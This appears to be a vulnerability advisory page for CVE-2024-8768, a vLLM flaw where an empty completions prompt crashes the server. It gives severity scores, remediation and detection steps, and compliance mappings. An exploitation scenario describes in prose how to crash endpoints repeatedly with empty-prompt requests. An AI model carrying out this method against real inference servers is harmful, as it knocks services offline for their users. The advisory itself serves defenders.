CVE-2024-8768: vLLM: unauthenticated DoS via empty completion prompt

HIGH PoC AVAILABLE CISA: TRACK*
Published September 17, 2024
CISO Take

Any vLLM inference server accessible over the network can be crashed with a single malformed request — no credentials required. If your AI stack uses vLLM for model serving (directly or via an agent framework), patch immediately to the fixed version or add upstream input validation to block empty prompt payloads. This is trivially weaponizable as an availability attack against production inference endpoints.

Risk Assessment

High risk for organizations running exposed vLLM inference APIs. CVSS 7.5 with AV:N/AC:L/PR:N/UI:N means any network-reachable instance is exploitable by an unauthenticated attacker with zero skill. vLLM is widely deployed as the inference backend for production LLM APIs, agent frameworks, and RAG pipelines, significantly broadening the attack surface. No active KEV listing but trivial reproducibility makes exploitation near-certain against unpatched instances.

Severity & Risk

CVSS 3.1
7.5 / 10
EPSS
0.0%
chance of exploitation in 30 days
Higher than 9% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Public PoC indexed (trickest/cve)
Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV AC PR UI S C I A
AV Network
AC Low
PR None
UI None
S Unchanged
C None
I None
A High

Recommended Action

5 steps
  1. PATCH

    Upgrade vLLM to the version containing PR #7746 fix immediately. Check vLLM release notes for the patched version tag.

  2. WORKAROUND (if patching is delayed): Deploy an API gateway or reverse proxy (nginx, Envoy, AWS API Gateway) upstream of vLLM that validates prompt fields are non-empty before forwarding requests. A simple 400-response rule on empty/null prompt body is sufficient.

  3. NETWORK CONTROLS

    Restrict vLLM API access to authenticated internal services only. vLLM should never be internet-facing without an auth layer.

  4. DETECTION

    Alert on HTTP 500 responses from vLLM endpoints and on process restart events for the vLLM server process. Repeated 500s from the same source IP are a strong signal.

  5. RATE LIMITING

    Implement per-client rate limiting at the API gateway layer to limit blast radius from abuse.

CISA SSVC Assessment

Decision Track*
Exploitation poc
Automatable Yes
Technical Impact partial

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.6.1.6 - AI system availability and resilience
NIST AI RMF
MANAGE 2.2 - Mechanisms are in place to respond to and recover from AI risks MAP 5.1 - Likelihood and magnitude of identified impacts are examined
OWASP LLM Top 10
LLM04 - Model Denial of Service

Frequently Asked Questions

What is CVE-2024-8768?

Any vLLM inference server accessible over the network can be crashed with a single malformed request — no credentials required. If your AI stack uses vLLM for model serving (directly or via an agent framework), patch immediately to the fixed version or add upstream input validation to block empty prompt payloads. This is trivially weaponizable as an availability attack against production inference endpoints.

Is CVE-2024-8768 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2024-8768, increasing the risk of exploitation.

How to fix CVE-2024-8768?

1. PATCH: Upgrade vLLM to the version containing PR #7746 fix immediately. Check vLLM release notes for the patched version tag. 2. WORKAROUND (if patching is delayed): Deploy an API gateway or reverse proxy (nginx, Envoy, AWS API Gateway) upstream of vLLM that validates prompt fields are non-empty before forwarding requests. A simple 400-response rule on empty/null prompt body is sufficient. 3. NETWORK CONTROLS: Restrict vLLM API access to authenticated internal services only. vLLM should never be internet-facing without an auth layer. 4. DETECTION: Alert on HTTP 500 responses from vLLM endpoints and on process restart events for the vLLM server process. Repeated 500s from the same source IP are a strong signal. 5. RATE LIMITING: Implement per-client rate limiting at the API gateway layer to limit blast radius from abuse.

What systems are affected by CVE-2024-8768?

This vulnerability affects the following AI/ML architecture patterns: LLM inference endpoints, model serving, agent frameworks, RAG pipelines, AI API gateways.

What is the CVSS score for CVE-2024-8768?

CVE-2024-8768 has a CVSS v3.1 base score of 7.5 (HIGH). The EPSS exploitation probability is 0.03%.

Technical Details

NVD Description

A flaw was found in the vLLM library. A completions API request with an empty prompt will crash the vLLM API server, resulting in a denial of service.

Exploitation Scenario

An adversary identifies a vLLM-powered inference endpoint (via DNS enumeration, Shodan, or internal network scanning). They send a POST request to /v1/completions with an empty string or null prompt field. The server triggers CWE-617 (reachable assertion failure) and crashes. The attacker can automate this in a loop to prevent service recovery. For organizations where vLLM backs a customer-facing AI product or internal copilot, this results in immediate and sustained availability outage. The attack requires no authentication, no AI/ML knowledge, and no special tooling — a simple curl command is sufficient.

Weaknesses (CWE)

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

Timeline

Published
September 17, 2024
Last Modified
September 20, 2024
First Seen
September 17, 2024

Related Vulnerabilities